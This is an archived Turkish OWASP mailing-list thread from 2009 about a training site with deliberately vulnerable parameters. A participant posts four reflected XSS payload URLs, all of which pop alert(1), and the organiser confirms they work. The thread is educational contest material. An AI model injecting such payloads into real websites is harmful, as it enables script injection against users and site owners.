[Owasp-turkey] Reflected XSS Oyun Grubu ve Yarisma

Bedirhan Urgun bedirhanurgun at gmail.com
Mon Jun 15 08:58:01 EDT 2009


yazdiginiz exploit url'yi calistigi browser'i da belirterek gondermeniz
yeterli. gonderdiklerinin hepsi ok!
15 Haziran 2009 Pazartesi 15:50 tarihinde E. Erdem <e2erdem at gmail.com>yazdı:

> Benden 4 tane (sadece FF3'te test edebildim. Tarayicilar bu konusunda
> bir sey soylenmemis):
>
> 1-
> http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E%22%3E&vector2=&vector3=&vector4=&vector5=&vector6=&vector7=
> 2- http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=
> <IMG+"""><SCRIPT>alert(1)<%2FSCRIPT>">&vector3=&vector4=&vector5=&vector6=&vector7=
> 4-
> http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=&vector3=&vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(49))%3C%2FSCRIPT%3E&vector5=&vector6=&vector7=
> 5-
> http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=&vector3=&vector4=&vector5=%3CIFRAME+SRC%3D%22javascript%3Aalert(1)%3B%22%3E%3C%2FIFRAME%3E&vector6=&vector7=
>
> 2009/6/15 Bedirhan Urgun <bedirhanurgun at gmail.com>:
>  > Merhaba,
> > Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir
> > "oyun grubu" uygulamasına
> http://www.webguvenligi.org/xsstb/reflected.php
> > eriÅŸebilirsiniz.
> > Uygulamada 7 parametreye (vector1, vector2, ..., vector7) uygulanabilecek
> > xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu maile
> reply-all
> > olarak asagida verdigim link gibi gonderen ilk iki kisye;
> >
> > 1inciye Maldivler'e 2 kisilik 7 gun 7 gece seyehat
> > 2inciye Son model araba
> >
> > Yok daha neler!...
> >
> > 1inciye OWASP Membership T-Shirt'u (L)
> > 2inciye OWASP Membership DVD'si
> >
> > gonderecegim.
> >
> > Ornek; (birinci tuyo benden)
> >
> http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E
> >
> >
> > Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli
> > Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi
> > Not 3: en son yazdigim hediyeler gecerli! sonra "vay ben gormedim"
> olmasin
> >
> > Proje Post'u:
> > http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html
> > --
> > Bedirhan Urgun
> > http://www.webguvenligi.org
> > http://www.owasp.org/index.php/Turkey
> >
> > Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
> > https://lists.owasp.org/mailman/listinfo/owasp-turkey
> >
> > _______________________________________________
> > Owasp-turkey mailing list
> > Owasp-turkey at lists.owasp.org
>  > https://lists.owasp.org/mailman/listinfo/owasp-turkey
> >
> >
>



-- 
Bedirhan Urgun
http://www.webguvenligi.org
http://www.owasp.org/index.php/Turkey

Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
https://lists.owasp.org/mailman/listinfo/owasp-turkey
-------------- sonraki bölüm --------------
Bir HTML eklentisi temizlendi...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20090615/25a324b5/attachment.html 


More information about the Owasp-turkey mailing list